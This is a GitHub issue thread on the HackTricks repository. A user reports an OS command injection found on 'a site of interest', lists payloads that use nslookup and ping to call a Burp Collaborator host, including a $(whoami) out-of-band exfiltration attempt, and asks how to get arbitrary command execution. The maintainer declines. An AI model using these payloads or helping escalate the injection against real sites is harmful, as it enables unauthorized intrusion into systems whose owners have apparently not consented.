HackTricks-wiki / hacktricks

Welcome to the page where you will find each trick/technique/whatever I have learnt in CTFs, real life apps, and reading researches and news.
http://book.hacktricks.xyz/
Other
8.5k stars 2.54k forks source link

out-of-band data exfiltration Command Injection Problem #759

Closed Deviandorex closed 2 months ago

Deviandorex commented 7 months ago

Hello friend, I was reviewing your profile and I think you are the right person for the help I need.

A few days ago I found a vulnerability in a site of interest through burp suite scanner using nslookup xxx.burpcolaborator.com exploit with the following feature

Issue: OS command injection Severity: High Confidence: Certain

Screenshot from 2023-12-08 20-29-32

the vulnerability only responds when using ` and only responds to the nslookup, sleep and ping including the burp colaborator. 1

Screenshot from 2023-12-08 20-35-28

These are the only commands it respond to.

nslookup xxx.burpcolaborator.com ping xxx.burpcolaborator.com sleep 10

other commands like nslookup $(whoami).xxx.burp collaborator.com They do not give any answer, please I would appreciate it if you could help me with this problem since I cannot find a way to exploit this vulnerability and I want it to execute other commands apart from nslookup or sleep.

I await your response. Thanx

carlospolop commented 2 months ago

I'm sorry, this is not the channel for this type of questions. Check in telegram/discord hacking groups better